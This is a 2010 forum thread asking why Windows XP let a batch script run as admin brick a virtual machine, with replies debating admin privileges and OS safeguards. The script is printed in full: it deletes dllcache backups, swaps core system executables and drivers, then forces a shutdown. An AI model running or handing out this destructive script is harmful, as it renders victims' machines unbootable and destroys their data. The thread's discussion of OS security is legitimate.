XP security

Burnsy2023 · 19 Oct 2010 at 14:31

I was amazed when I tried running this script in a VM as an admin (as many people do) and found that it did indeed manage to brick the install. Surely a script kiddy would be foiled by rudimentary OS security?

Code:

@echo off
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
tskill explorer
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA 
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA

I was under the impression that all of these would surely either have sharing violations on them or complete file permissions failures.

Can someone explain to me how this manages to work and why people on XP still insist on running XP as admin?

Burnsy2023 · 19 Oct 2010 at 14:39

J.B said:
Im actually surprised that worked inside of Windows.

That seems crazy when you think about it.

have you tried just running parts of it at a time? Im just surprised it let you rename explorer.exe

Indeed. I was just as amazed. I ran the top bit before the shutdown command. No errors bar the copying of taskmanager.

Burnsy2023 · 19 Oct 2010 at 14:48

edscdk said:
would have failed due to being open... (though my thinking is obviously wrong)

Indeed. I expected sharing violations. How was it able to still run?

Burnsy2023 · 19 Oct 2010 at 15:04

SiriusB said:
It is almost never a good idea to move, rename or delete core OS executables. The surprise is more in that the OS let it happen without any complaints, rather than it being possible.

There isn't even a confirmation prompt.

Burnsy2023 · 19 Oct 2010 at 15:16

markweatherill said:
How did you get the script onto the machine?

I just copy and pasted it, but I'm sure it could be automated easily enough.

Burnsy2023 · 19 Oct 2010 at 15:55

Does anyone have a Vista/7 VM they could try this on? I take it it wouldn't work with the new security model?

Burnsy2023 · 19 Oct 2010 at 16:01

SiriusB said:
Which begs the question, why let even admins delete backup dlls/files without any kind of prompt/warning/prevention?

Yes Admins should have mighty powers to do with as they wish, but one would hope the OS isn't that trusting. I am quite confident my doctor knows what she is doing, doesn't mean I'd be OK with her hacking off a limb!

In all fairness, I like proper God mode, it can be very useful to just be able to do what you know is correct. However, this power should not be bestowed on a user lightly.